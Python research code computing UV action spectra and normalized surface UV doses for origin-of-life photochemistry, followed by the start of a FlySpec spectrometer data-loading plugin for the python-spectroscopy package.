cucn3_wav=importeddata[:,0] #wav in nm
cucn3_molabs=importeddata[:,1] #molar absorptivities in L/(mol*cm), decadic
cucn3_molabs_func=interp.interp1d(cucn3_wav, cucn3_molabs, kind='linear') #functionalized form of cucn3 molar absorption
#does not matter if you use decadic or natural logarithmic as constant factors normalize out anyway
#Formulate the step-function quantum yield curve
def qy_stepfunc(wav, lambda0): #step function, for the photoionization model
"""Returns 1 for wav<=lambda0 and 0 for wav>lambda0"""
qy=np.zeros(np.size(wav))# initialize all to zero
inds=np.where(wav<=lambda0) #indices where the wavelength is below the threshold
qy[inds]=qy[inds]+0.06 #increase the QE to 1 at the indices where the wavelength is below the threshold
return qy
#Integrate these quantities to match the input spectral resolution
qy_dist=np.zeros(np.shape(wav_left))#initialize variable to hold the QY integrated over the surface intensity wavelength bins
cucn3_molabs_dist=np.zeros(np.shape(wav_left))#initialize variable to hold the QY integrated over the surface intensity wavelength bins
for ind in range(0, len(wav_left)):
leftedge=wav_left[ind]
rightedge=wav_right[ind]
cucn3_molabs_dist[ind]=scipy.integrate.quad(cucn3_molabs_func, leftedge, rightedge, epsabs=0, epsrel=1e-5)[0]/(rightedge-leftedge)
qy_dist[ind]=scipy.integrate.quad(qy_stepfunc, leftedge, rightedge, args=(lambda0), epsabs=0, epsrel=1e-5)[0]/(rightedge-leftedge)
action_spectrum=cucn3_molabs_dist*qy_dist
#Normalize action spectrum to 1 at 195 (arbitrary)
action_spectrum=action_spectrum*(1./(np.interp(190., 0.5*(wav_left+wav_right), action_spectrum)))
####Step 3: Compute action-spectrum weighted total intensity
weighted_surface_intensity=surf_int*action_spectrum
total_weighted_radiance=np.sum(weighted_surface_intensity*delta_wav) #units: photons/cm2/s
####Step 4 (Optional): Plot various components of action spectrum to show the multiplication
if produceplots:
legendfontsize=12
axisfontsize=12
##Plot ribonucleotide absorption and interpolation
fig1, axarr=plt.subplots(3,2,sharex=True, figsize=(8., 10.5)) #specify figure size (width, height) in inches
axarr[0,0].bar(wav_left, surf_int,width=delta_wav, color='black', alpha=0.5, log=True)
axarr[0,0].set_ylim([1e10,1e16])
axarr[0,0].legend(loc=2, prop={'size':legendfontsize})
axarr[0,0].yaxis.grid(True)
axarr[0,0].xaxis.grid(True)
axarr[0,0].set_ylabel('Surface Radiance \n(photons cm$^{-2}$s$^{-1}$nm$^{-1}$)', fontsize=axisfontsize)
#axarr[0,0].title.set_position([0.5, 1.11])
#axarr[0,0].text(0.5, 1.1, r'a(i)', transform=axarr[0].transAxes, va='top')
axarr[1,0].bar(wav_left, cucn3_molabs_dist,width=delta_wav, color='black', alpha=0.5, log=True)
#axarr[1,0].set_ylim([-0.1, 1.1])
axarr[1,0].legend(loc=6, prop={'size':legendfontsize})
axarr[1,0].yaxis.grid(True)
axarr[1,0].xaxis.grid(True)
axarr[1,0].set_ylabel('CuCN3 Molar Absorptivity\n(M$^{-1}$cm$^{-1}$)', fontsize=axisfontsize)
#axarr[1,0].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
axarr[2,0].bar(wav_left, qy_dist,width=delta_wav, color='black', alpha=0.5)
axarr[2,0].set_ylim([-0.01, 0.06])
axarr[2,0].legend(loc=6, prop={'size':legendfontsize})
axarr[2,0].yaxis.grid(True)
axarr[2,0].xaxis.grid(True)
axarr[2,0].set_ylabel('Quantum Efficiency \n(reductions absorption$^{-1}$)', fontsize=axisfontsize)
#axarr[2,0].text(0.5, 1.10, r'c(i)', fontsize=12,transform=axarr[2].transAxes, va='top')
axarr[0,1].bar(wav_left, action_spectrum,width=delta_wav, color='black', alpha=0.5)
#axarr[0,1].set_ylim([-0.1, 1.1])
axarr[0,1].legend(loc=6, prop={'size':legendfontsize})
axarr[0,1].yaxis.grid(True)
axarr[0,1].xaxis.grid(True)
axarr[0,1].set_ylabel('Action Spectrum', fontsize=axisfontsize)
#axarr[0,1].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
axarr[1,1].bar(wav_left, weighted_surface_intensity,width=delta_wav, color='black', alpha=0.5)
#axarr[1,1].set_ylim([-0.1, 1.1])
axarr[1,1].legend(loc=6, prop={'size':legendfontsize})
axarr[1,1].yaxis.grid(True)
axarr[1,1].xaxis.grid(True)
axarr[1,1].set_ylabel('Weighted Surface Radiance', fontsize=axisfontsize)
#axarr[1,1].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
#plt.savefig('/home/sranjan/Python/UV/Plots/ritson_assumed_qe_v3.pdf', orientation='portrait',papertype='letter', format='pdf')
plt.show()
if returnxy:
return 0.5*(wav_left+wav_right), action_spectrum
else:
return total_weighted_radiance
def ump_glycosidic_photol(wav_left, wav_right, surf_int, lambda0, produceplots, returnxy):
"""
Weights the input surface intensities by the action spectrum for cleavage of the glycosidic bond in UMP (the U-RNA monomer), aka base release. We form this spectrum by convolving the pH=7.6 absorption spectrum for Uridine-3'-(2')-phosporic acid (i.e. uridylic acid, UMP) from Voet et al (1963) with an assumed QY curve. The QY curve is based on the work of Gurzadyan and Gorner (1994); they measure (wavelength, QY) for N-glycosidic bond cleavage in UMP in anoxic aqueous solution (Ar-suffused) to be (193 nm, 4.3e-3) and (254 nm, (2-3)e-5). Specifically, we assume that QY=4.3e-3 for lambda<=lambda_0 and QY=2.5e-5 for lambda>lambda_0. natural choices of lambda_0 are 194, 254, and 230 (first two: empirical limits. Last: end of pi-pi* absorption bad, Sinsheimer+1949 suggest it is onset of irreversible photolytic damage).
This process is a stressor for abiogenesis.
wav_left: left edge of wavelength bin, in nm
wav_right: right edge of wavelength bin, in nm
surf_int: total surface intensity (radiance, hemispherically-integrated) in photons/cm2/s/nm, in bin defined by wav_left and wav_right
lambda0: value assume for lambda0.
produceplots: if True, shows plots of what it is computing
returnxy: if True, returns x,y for action spectrum.
"""
####Step 1: reduce input spectrum to match bounds of available dataset (absorption).
int_min=184.0 #This lower limit of integration is set by the limits of the cucn3 absorption dataset (left edge of bin)
int_max=299.0 #This upper limit of integration is set by the limits of the cucn3 absorption dataset (right edge of bin)
allowed_inds=np.where((wav_left>=int_min) & (wav_right<=int_max)) #indices that correspond to included data
wav_left=wav_left[allowed_inds]
wav_right=wav_right[allowed_inds]
surf_int=surf_int[allowed_inds]
delta_wav=wav_right-wav_left #size of wavelength bins in nm
####Step 2: form the action spectrum from the absorption spectrum and QY curve.
#Import the UMP absorption spectrum from Voet et al 1963
importeddata=np.genfromtxt('./Raw_Data/Voet_Data/ribouridine_pH_7.3_v2.txt', skip_header=0, delimiter=',')
ump_wav=importeddata[:,0] #wav in nm
ump_molabs=importeddata[:,1] #molar absorptivities\times 10^{3}, i.e. in units of 10^{-3} L/(mol*cm), decadic (I think -- unit scheme unclear in paper. Not important since normalized out)
ump_molabs_func=interp.interp1d(ump_wav, ump_molabs, kind='linear') #functionalized form of molar absorption
#does not matter if you use decadic or natural logarithmic as constant factors normalize out anyway
#Formulate the step-function quantum yield curve
def qy_stepfunc(wav, lambda0): #step function, for the photoionization model
"""QY based on work of Gurzadyan and Gorner 1994"""
qy=np.zeros(np.size(wav))# initialize all to zero
inds1=np.where(wav<=lambda0) #indices where the wavelength is below the threshold
inds2=np.where(wav>lambda0) #indices where the wavelength is below the threshold
qy[inds1]=qy[inds1]+4.3e-3 #High QY for lambda<=lambda0
qy[inds2]=qy[inds2]+2.5e-5 #Low QY for lambda>lambda0
return qy
#Integrate these quantities to match the input spectral resolution
qy_dist=np.zeros(np.shape(wav_left))#initialize variable to hold the QY integrated over the surface intensity wavelength bins
ump_molabs_dist=np.zeros(np.shape(wav_left))#initialize variable to hold the UMP absorption integrated over the surface intensity wavelength bins
for ind in range(0, len(wav_left)):
leftedge=wav_left[ind]
rightedge=wav_right[ind]
ump_molabs_dist[ind]=scipy.integrate.quad(ump_molabs_func, leftedge, rightedge, epsabs=0, epsrel=1e-5)[0]/(rightedge-leftedge)
qy_dist[ind]=scipy.integrate.quad(qy_stepfunc, leftedge, rightedge, args=(lambda0),epsabs=0, epsrel=1e-5)[0]/(rightedge-leftedge)
action_spectrum=ump_molabs_dist*qy_dist
#Normalize action spectrum to 1 at 195 (arbitrary)
action_spectrum=action_spectrum*(1./(np.interp(190., 0.5*(wav_left+wav_right), action_spectrum)))
####Step 3: Compute action-spectrum weighted total intensity
weighted_surface_intensity=surf_int*action_spectrum
total_weighted_radiance=np.sum(weighted_surface_intensity*delta_wav) #units: photons/cm2/s
####Step 4 (Optional): Plot various components of action spectrum to show the multiplication
if produceplots:
legendfontsize=12
axisfontsize=12
##Plot ribonucleotide absorption and interpolation
fig1, axarr=plt.subplots(3,2,sharex=True, figsize=(8., 10.5)) #specify figure size (width, height) in inches
axarr[0,0].bar(wav_left, surf_int,width=delta_wav, color='black', alpha=0.5, log=True)
axarr[0,0].set_ylim([1e10,1e16])
axarr[0,0].legend(loc=2, prop={'size':legendfontsize})
axarr[0,0].yaxis.grid(True)
axarr[0,0].xaxis.grid(True)
axarr[0,0].set_ylabel('Surface Radiance \n(photons cm$^{-2}$s$^{-1}$nm$^{-1}$)', fontsize=axisfontsize)
#axarr[0,0].title.set_position([0.5, 1.11])
#axarr[0,0].text(0.5, 1.1, r'a(i)', transform=axarr[0].transAxes, va='top')
axarr[1,0].bar(wav_left, ump_molabs_dist,width=delta_wav, color='black', alpha=0.5, log=False)
#axarr[1,0].set_ylim([-0.1, 1.1])
axarr[1,0].legend(loc=6, prop={'size':legendfontsize})
axarr[1,0].yaxis.grid(True)
axarr[1,0].xaxis.grid(True)
axarr[1,0].set_ylabel('UMP Molar Absorptivity\n(M$^{-1}$cm$^{-1}$)', fontsize=axisfontsize)
#axarr[1,0].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
axarr[2,0].bar(wav_left, qy_dist,width=delta_wav, color='black', alpha=0.5, log=True)
axarr[2,0].set_ylim([1e-5, 1e-2])
axarr[2,0].legend(loc=6, prop={'size':legendfontsize})
axarr[2,0].yaxis.grid(True)
axarr[2,0].xaxis.grid(True)
axarr[2,0].set_ylabel('Quantum Efficiency \n(reductions absorption$^{-1}$)', fontsize=axisfontsize)
#axarr[2,0].text(0.5, 1.10, r'c(i)', fontsize=12,transform=axarr[2].transAxes, va='top')
axarr[0,1].bar(wav_left, action_spectrum,width=delta_wav, color='black', alpha=0.5)
#axarr[0,1].set_ylim([-0.1, 1.1])
axarr[0,1].legend(loc=6, prop={'size':legendfontsize})
axarr[0,1].yaxis.grid(True)
axarr[0,1].xaxis.grid(True)
axarr[0,1].set_ylabel('Action Spectrum', fontsize=axisfontsize)
#axarr[0,1].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
axarr[1,1].bar(wav_left, weighted_surface_intensity,width=delta_wav, color='black', alpha=0.5)
#axarr[1,1].set_ylim([-0.1, 1.1])
axarr[1,1].legend(loc=6, prop={'size':legendfontsize})
axarr[1,1].yaxis.grid(True)
axarr[1,1].xaxis.grid(True)
axarr[1,1].set_ylabel('Weighted Surface Radiance', fontsize=axisfontsize)
#axarr[1,1].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
#plt.savefig('/home/sranjan/Python/UV/Plots/ritson_assumed_qe_v3.pdf', orientation='portrait',papertype='letter', format='pdf')
plt.show()
if returnxy:
return 0.5*(wav_left+wav_right), action_spectrum
else:
return total_weighted_radiance
########################
###Plot UV Dosimeters
########################
if plotactionspec:
#Set up wavelength scale
wave_left=np.arange(100., 500.)
wave_right=np.arange(101., 501.)
wave_centers=0.5*(wave_left+wave_right)
surf_int=np.ones(np.shape(wave_centers)) #for our purposes here, this is a thunk.
#Extract action spectra
wav_gly_193, actspec_gly_193=ump_glycosidic_photol(wave_left, wave_right, surf_int, 193., False, True)
wav_gly_230, actspec_gly_230=ump_glycosidic_photol(wave_left, wave_right, surf_int, 230., False, True)
wav_gly_254, actspec_gly_254=ump_glycosidic_photol(wave_left, wave_right, surf_int, 254., False, True)
wav_aqe_254, actspec_aqe_254=tricyano_aqe_prodrate(wave_left, wave_right, surf_int, 254., False, True)
wav_aqe_300, actspec_aqe_300=tricyano_aqe_prodrate(wave_left, wave_right, surf_int, 300., False, True)
#####Plot action spectra
#Initialize Figure
fig, (ax1)=plt.subplots(1, figsize=(cm2inch(16.5),6), sharex=True)
colorseq=iter(cm.rainbow(np.linspace(0,1,5)))
#Plot Data
ax1.plot(wav_gly_193,actspec_gly_193, linestyle='-',linewidth=2, color=next(colorseq), label=r'UMP Gly Bond Cleavage ($\lambda_0=193$)')
ax1.plot(wav_gly_230,actspec_gly_230, linestyle='-',linewidth=2, color=next(colorseq), label=r'UMP Gly Bond Cleavage ($\lambda_0=230$)')
ax1.plot(wav_gly_254,actspec_gly_254, linestyle='-',linewidth=2, color=next(colorseq), label=r'UMP Gly Bond Cleavage ($\lambda_0=254$)')
ax1.plot(wav_aqe_254,actspec_aqe_254, linestyle='-',linewidth=2, color=next(colorseq), label=r'CuCN$_{3}$$^{2-}$ Photoionization ($\lambda_0=254$)')
ax1.plot(wav_aqe_300,actspec_aqe_300, linestyle='--',linewidth=2, color=next(colorseq), label=r'CuCN$_{3}$$^{2-}$ Photoionization ($\lambda_0=300$)')
#####Finalize and save figure
ax1.set_title(r'Action Spectra')
ax1.set_xlim([180.,360.])
ax1.set_xlabel('nm')
ax1.set_ylabel(r'Relative Sensitivity')
ax1.set_yscale('log')
ax1.set_ylim([1e-6, 1e2])
#ax1.legend(bbox_to_anchor=[0, 1.1, 1,1], loc=3, ncol=2, mode='expand', borderaxespad=0., fontsize=10)
ax1.legend(loc='upper right', ncol=1, fontsize=10)
plt.tight_layout(rect=(0,0,1,1))
plt.savefig('./Plots/actionspectra.eps', orientation='portrait',papertype='letter', format='eps')
if plotactionspec_talk:
#Set up wavelength scale
wave_left=np.arange(100., 500.)
wave_right=np.arange(101., 501.)
wave_centers=0.5*(wave_left+wave_right)
surf_int=np.ones(np.shape(wave_centers)) #for our purposes here, this is a thunk.
#Extract action spectra
wav_gly_193, actspec_gly_193=ump_glycosidic_photol(wave_left, wave_right, surf_int, 193., False, True)
wav_gly_230, actspec_gly_230=ump_glycosidic_photol(wave_left, wave_right, surf_int, 230., False, True)
wav_gly_254, actspec_gly_254=ump_glycosidic_photol(wave_left, wave_right, surf_int, 254., False, True)
wav_aqe_254, actspec_aqe_254=tricyano_aqe_prodrate(wave_left, wave_right, surf_int, 254., False, True)
wav_aqe_300, actspec_aqe_300=tricyano_aqe_prodrate(wave_left, wave_right, surf_int, 300., False, True)
#####Plot action spectra
#Initialize Figure
fig, (ax1)=plt.subplots(1, figsize=(10,9), sharex=True)
colorseq=iter(cm.rainbow(np.linspace(0,1,5)))
#Plot Data
ax1.plot(wav_gly_193,actspec_gly_193, linestyle='-',linewidth=3, color=next(colorseq), label=r'UMP-193')
ax1.plot(wav_gly_230,actspec_gly_230, linestyle='-',linewidth=3, color=next(colorseq), label=r'UMP-230')
ax1.plot(wav_gly_254,actspec_gly_254, linestyle='-',linewidth=3, color=next(colorseq), label=r'UMP-254')
ax1.plot(wav_aqe_254,actspec_aqe_254, linestyle='-',linewidth=3, color=next(colorseq), label=r'CuCN3-254')
ax1.plot(wav_aqe_300,actspec_aqe_300, linestyle='--',linewidth=3, color=next(colorseq), label=r'CuCN3-300')
#####Finalize and save figure
ax1.set_title(r'Action Spectra', fontsize=24)
ax1.set_xlim([180.,360.])
ax1.set_xlabel('nm',fontsize=24)
ax1.set_ylabel(r'Relative Sensitivity', fontsize=24)
ax1.set_yscale('log')
ax1.set_ylim([1e-6, 1e2])
ax1.legend(bbox_to_anchor=[0, 1.1, 1,0.5], loc=3, ncol=2, mode='expand', borderaxespad=0., fontsize=24)
#ax1.legend(loc='upper right', ncol=1, fontsize=16)
ax1.xaxis.set_tick_params(labelsize=24)
ax1.yaxis.set_tick_params(labelsize=24)
plt.tight_layout(rect=(0,0,1,0.75))
plt.savefig('./TalkFigs/actionspectra.pdf', orientation='portrait',papertype='letter', format='pdf')
########################
###Set "base" values to normalize the alb-zen, co2, and alt-gas dosimeters by
########################
#Use the TOA flux in order to get a good, physically understandable denominator.
wav_leftedges, wav_rightedges, wav, toa_intensity=np.genfromtxt('./TwoStreamOutput/AlbZen/rugheimer_earth_epoch0_a=0.2_z=60.dat', skip_header=1, skip_footer=0, usecols=(0, 1,2, 3), unpack=True)
toa_intensity_photons=toa_intensity*(wav/(hc))
#Compute base doses
intrad100_165_base=integrated_radiance(wav_leftedges, wav_rightedges, toa_intensity_photons, 100, 165.) #This measures the flux vulnerable to activity
intrad200_300_base=integrated_radiance(wav_leftedges, wav_rightedges, toa_intensity_photons, 200., 300.) #This is just an empirical gauge.
umpgly_193_base=ump_glycosidic_photol(wav_leftedges, wav_rightedges, toa_intensity_photons, 193., False, False)
umpgly_230_base=ump_glycosidic_photol(wav_leftedges, wav_rightedges, toa_intensity_photons,230., False, False)
umpgly_254_base=ump_glycosidic_photol(wav_leftedges, wav_rightedges, toa_intensity_photons, 254., False, False)
tricyano254_base=tricyano_aqe_prodrate(wav_leftedges, wav_rightedges, toa_intensity_photons, 254., False, False)
tricyano300_base=tricyano_aqe_prodrate(wav_leftedges, wav_rightedges, toa_intensity_photons, 300., False, False)
########################
###Run code for albedo, zenith angle
########################
if calculatealbaz:
#Evaluate only two zenith angles (to show range of variation)
zenithangles=['66.5', '0']
albedos=['tundra', 'ocean', 'desert', 'oldsnow', 'newsnow']
for zenind in range(0, len(zenithangles)):
zenithangle=zenithangles[zenind]
for albind in range(0, len(albedos)):
albedo=albedos[albind]
datafile='./TwoStreamOutput/AlbZen/rugheimer_earth_epoch0_a='+albedo+'_z='+zenithangle+'.dat'
left, right, surface_int=get_UV(datafile)
intrad100_165=integrated_radiance(left, right, surface_int, 100, 165.) #This measures the flux vulnerable to activity
intrad200_300=integrated_radiance(left, right, surface_int, 200., 300.) #This is just an empirical gauge.
umpgly_193=ump_glycosidic_photol(left, right, surface_int, 193., False, False)
umpgly_230=ump_glycosidic_photol(left, right, surface_int,230., False, False)
umpgly_254=ump_glycosidic_photol(left, right, surface_int, 254., False, False)
tricyano254=tricyano_aqe_prodrate(left, right, surface_int, 254., False, False)
tricyano300=tricyano_aqe_prodrate(left, right, surface_int, 300., False, False)
line=np.array([zenithangle, albedo, intrad100_165/intrad100_165_base,intrad200_300/intrad200_300_base, umpgly_193/umpgly_193_base, umpgly_230/umpgly_230_base, umpgly_254/umpgly_254_base, tricyano254/tricyano254_base, tricyano300/tricyano300_base])
if (albind==0 and zenind==0):
albzentable=line #need to initialize in this case
else:
albzentable=np.vstack((albzentable, line))
#Save output
f=open('./Doses/albzen_uv_doses.dat','w')
f.write('All Dosimeters Normalized to Space Radiation Case\n')
np.savetxt(f, albzentable, delimiter=' ', fmt='%s', newline='\n', header='Zenith Angle & Albedo & Radiance (100-165 nm) & Radiance (200-300 nm) & UMP Gly Cleavage (lambda0=193nm) & UMP Gly Cleavage (lambda0=230nm) & UMP Gly Cleavage (lambda0=254nm) & CuCN3 Photoionization (lambda0=254 nm) & CuCN3 Photoionization (lambda0=300 nm)\n')
f.close()
########################
###Run code for varying CO2 levels
########################
if calculateco2:
N_co2_rugh=2.09e24 #column density of CO2 in Rugheimer base model (cm**-2)
co2multiples=np.array([0., 1.e-6,1.e-5, 1.e-4, 1.e-3, 0.00893, 1.e-2, 1.e-1, 0.6, 1., 1.33, 1.e1, 46.6, 1.e2, 470., 1.e3])
zenithangles=['0', '66.5']
albedos=['newsnow', 'tundra']
for surfind in range(0, len(zenithangles)):
albedo=albedos[surfind]
zenithangle=zenithangles[surfind]
for multind in range(0, len(co2multiples)):
multiple=co2multiples[multind]
colden_co2=N_co2_rugh*multiple
datafile='./TwoStreamOutput/CO2lim/surface_intensities_co2limits_co2multiple='+str(multiple)+'_a='+albedo+'_z='+zenithangle+'.dat'
left, right, surface_int=get_UV(datafile)
intrad100_165=integrated_radiance(left, right, surface_int, 100, 165.) #This measures the flux vulnerable to activity
intrad200_300=integrated_radiance(left, right, surface_int, 200., 300.) #This is just an empirical gauge.
umpgly_193=ump_glycosidic_photol(left, right, surface_int, 193., False, False)
umpgly_230=ump_glycosidic_photol(left, right, surface_int,230., False, False)
umpgly_254=ump_glycosidic_photol(left, right, surface_int, 254., False, False)
tricyano254=tricyano_aqe_prodrate(left, right, surface_int, 254., False, False)
tricyano300=tricyano_aqe_prodrate(left, right, surface_int, 300., False, False)
#print intrad200_300
#pdb.set_trace()
line=np.array([zenithangle, albedo, colden_co2, intrad100_165/intrad100_165_base,intrad200_300/intrad200_300_base, umpgly_193/umpgly_193_base, umpgly_230/umpgly_230_base, umpgly_254/umpgly_254_base, tricyano254/tricyano254_base, tricyano300/tricyano300_base])
if (multind==0 and surfind==0):
co2table=line #need to initialize in this case
else:
co2table=np.vstack((co2table, line))
#Save Output
f=open('./Doses/co2_uv_doses.dat','w')
f.write('All Dosimeters Normalized to Space Radiation Case\n')
np.savetxt(f, co2table, delimiter=' ', fmt='%s', newline='\n', header='Zenith Angle & Albedo & Radiance (100-165 nm) & Radiance (200-300 nm) & UMP Gly Cleavage (lambda0=193nm) & UMP Gly Cleavage (lambda0=230nm) & UMP Gly Cleavage (lambda0=254nm) & CuCN3 Photoionization (lambda0=254 nm) & CuCN3 Photoionization (lambda0=300 nm)\n')
f.close()
########################
###Run code for alternate gas absorption.
########################
if calculatealtgas:
#####Set up info about the files to extract # All are the maximum possible natural surface radiance case (z=0, albedo=fresh snow) aka "max"
N_tot=2.0925e25#total column density of Rugheimer+2015 model in cm**-2
gaslist=['h2o', 'ch4', 'so2', 'o2', 'o3', 'h2s'] #list of gases we are doing this for
base_abundances=np.array([4.657e-3, 1.647e-6, 3.548e-11, 2.241e-6, 8.846e-11, 7.097e-11]) #molar concentration of each of these gases in the Rugheimer model.
gasmultiples={}#dict holding the multiples of the molar concentration we are using
gasmultiples['h2o']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5])
gasmultiples['ch4']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5])
gasmultiples['so2']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5, 1.e6, 1.e7])
gasmultiples['o2']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5])
gasmultiples['o3']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5])
gasmultiples['h2s']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5, 1.e6, 1.e7])
#####In a loop, extract the files and compute the statistics
for gasind in range(0, len(gaslist)):
gas=gaslist[gasind]
base_abundance=base_abundances[gasind]
multiples=gasmultiples[gas]
for multind in range(0, len(multiples)):
multiple=multiples[multind]
colden_X=base_abundance*multiple*N_tot #total column density of gas X
datafile='./TwoStreamOutput/gaslim/surface_intensities_'+gas+'limits_'+gas+'multiple='+str(multiple)+'_a=newsnow_z=0.dat'
left, right, surface_int=get_UV(datafile)
intrad100_165=integrated_radiance(left, right, surface_int, 100, 165.) #This measures the flux vulnerable to activity
intrad200_300=integrated_radiance(left, right, surface_int, 200., 300.) #This is just an empirical gauge.
umpgly_193=ump_glycosidic_photol(left, right, surface_int, 193., False, False)
umpgly_230=ump_glycosidic_photol(left, right, surface_int,230., False, False)
umpgly_254=ump_glycosidic_photol(left, right, surface_int, 254., False, False)
tricyano254=tricyano_aqe_prodrate(left, right, surface_int, 254., False, False)
tricyano300=tricyano_aqe_prodrate(left, right, surface_int, 300., False, False)
line=np.array([gas, colden_X, intrad100_165/intrad100_165_base,intrad200_300/intrad200_300_base, umpgly_193/umpgly_193_base, umpgly_230/umpgly_230_base, umpgly_254/umpgly_254_base, tricyano254/tricyano254_base, tricyano300/tricyano300_base])
if (multind==0):
altgastable=line #need to initialize in this case
else:
altgastable=np.vstack((altgastable, line))
f=open('./Doses/'+gas+'_uv_doses.dat','w')
f.write('All Dosimeters Normalized to Space Radiation Case\n')
np.savetxt(f, altgastable, delimiter=' & ', fmt='%s', newline='\n', header='Gas & Column Density (cm-2) & Radiance (100-165 nm) & Radiance (200-300 nm) & UMP Gly Cleavage (lambda0=193nm) & UMP Gly Cleavage (lambda0=230nm) & UMP Gly Cleavage (lambda0=254nm) & CuCN3 Photoionization (lambda0=254 nm) & CuCN3 Photoionization (lambda0=300 nm)\n')
f.close()
#Wrap Up
########################
###Wrap Up
########################
plt.show()
| mit | -5,561,900,649,416,079,000 | 54.317254 | 825 | 0.713442 | false |
nonbiostudent/python-spectroscopy | src/spectroscopy/plugins/flyspec.py | 1 | 8319 | """
Plugin to read and write FlySpec data.
"""
import calendar
import datetime
import os
import numpy as np
from spectroscopy.dataset import Dataset, Spectra, ResourceIdentifier, Retrievals
from spectroscopy.plugins import DatasetPluginBase
class FlySpecPluginException(Exception):
pass
class FlySpecPlugin(DatasetPluginBase):
def open(self, filename, format=None, timeshift=0.0, **kargs):
"""
Load data from FlySpec instruments.
:param timeshift: float
:type timeshift: FlySpecs record data in local time so a timeshift in
hours of local time with respect to UTC can be given. For example
`timeshift=12.00` will subtract 12 hours from the recorded time.
"""
# load data and convert southern hemisphere to negative
# latitudes and western hemisphere to negative longitudes
def todd(x):
"""
Convert degrees and decimal minutes to decimal degrees.
"""
idx = x.find('.')
minutes = float(x[idx - 2:]) / 60.
deg = float(x[:idx - 2])
return deg + minutes
data = np.loadtxt(filename, usecols=range(0, 21),
converters={
8: todd,
9: lambda x: -1.0 if x.lower() == 's' else 1.0,
10: todd,
11: lambda x: -1.0 if x.lower() == 'w' else 1.0})
if len(data.shape) < 2:
raise FlySpecPluginException(
'File %s contains only one data point.'
% (os.path.basename(filename)))
ts = -1. * timeshift * 60. * 60.
int_times = np.zeros(data[:, :7].shape, dtype='int')
int_times[:, :6] = data[:, 1:7]
# convert decimal seconds to milliseconds
int_times[:, 6] = (data[:, 6] - int_times[:, 5]) * 1000
times = [datetime.datetime(*int_times[i, :]) +
datetime.timedelta(seconds=ts)
for i in range(int_times.shape[0])]
unix_times = [calendar.timegm(i.utctimetuple()) for i in times]
latitude = data[:, 8] * data[:, 9]
longitude = data[:, 10] * data[:, 11]
elevation = data[:, 12]
so2 = data[:, 16]
angles = data[:, 17]
s = Spectra(self, angle=np.zeros(angles.shape),
position=np.zeros((latitude.size, 3)),
time=np.zeros(angles.shape))
slice_start = 0
slice_end = slice_start
self.d = Dataset(self, spectra=[s])
for a in self._split_by_scan(angles, unix_times, longitude,
latitude, elevation, so2):
slice_end = slice_start + a[0].size
s.angle[slice_start:slice_end] = a[0]
s.time[slice_start:slice_end] = a[1]
position = np.vstack((a[2], a[3], a[4])).T
s.position[slice_start:slice_end, :] = position
r = Retrievals(self,
spectra_id=ResourceIdentifier(s.resource_id.id),
type='FlySpec', gas_species='SO2',
slice=slice(slice_start, slice_end), sca=a[5])
self.d.retrievals.append(r)
slice_start = slice_end
# Consistency check to make sure no data was dropped during slicing
assert s.angle.std() == angles.std()
return self.d
def _array_multi_sort(self, *arrays):
"""
Sorts multiple numpy arrays based on the contents of the first array.
>>> x1 = np.array([4.,5.,1.,2.])
>>> x2 = np.array([10.,11.,12.,13.])
>>> f = FlySpecPlugin()
>>> f._array_multi_sort(*tuple([x1,x2]))
(array([ 1., 2., 4., 5.]), array([ 12., 13., 10., 11.]))
"""
c = np.rec.fromarrays(
arrays, names=[str(i) for i in range(len(arrays))])
c.sort() # sort based on values in first array
return tuple([c[str(i)] for i in range(len(arrays))])
def _split_by_scan(self, angles, *vars_):
"""
Returns an iterator that will split lists/arrays of data by scan (i.e.
between start and end angle) an arbitrary number of lists of data can
be passed in - the iterator will return a list of arrays of length
len(vars_) + 1 with the split angles array at index one, and the
remaining data lists in order afterwards. The lists will be sorted
into ascending angle order.
>>> angles = np.array([30, 35, 40, 35, 30, 35, 40])
>>> f = FlySpecPlugin()
>>> [a[0] for a in f._split_by_scan(angles)]
[array([30, 35, 40]), array([30, 35]), array([35, 40])]
>>> [a[1] for a in f._split_by_scan(angles, np.array([1,2,3,4,5,6,7]))]
[array([1, 2, 3]), array([5, 4]), array([6, 7])]
"""
# everything breaks if there are more than two equal angles in a row.
if np.any(np.logical_and((angles[1:] == angles[:-1])[:-1],
angles[2:] == angles[:-2])):
idx = np.argmax(np.logical_and(
(angles[1:] == angles[:-1])[:-1], angles[2:] == angles[:-2]))
raise ValueError, "Data at line " + str(idx + 2) + \
" contains three or more repeated angle entries (in a row). \
Don't know how to split this into scans."
anglegradient = np.zeros(angles.shape)
anglegradient[1:] = np.diff(angles)
# if there are repeated start or end angles, then you end up with zeros
# in the gradients. Possible zeros at the start need to be dealt with
# separately, otherwise you end up with the first point being put in a
# scan of its own.
if anglegradient[1] == 0:
anglegradient[1] = anglegradient[2]
if anglegradient[-1] == 0:
anglegradient[-1] = anglegradient[-2]
anglegradient[0] = anglegradient[1]
# replace zero gradients within the array with the value of its left
# neighbour
b = np.roll(anglegradient, 1)
b[0] = anglegradient[0]
anglegradient = np.where(np.abs(anglegradient) > 0, anglegradient, b)
firstarray = anglegradient > 0
secondarray = np.copy(firstarray)
secondarray[1:] = secondarray[0:-1]
secondarray[0] = not secondarray[0]
inflectionpoints = np.where(firstarray != secondarray)[0]
if len(inflectionpoints) < 2:
yield self._array_multi_sort(angles, *vars_)
else:
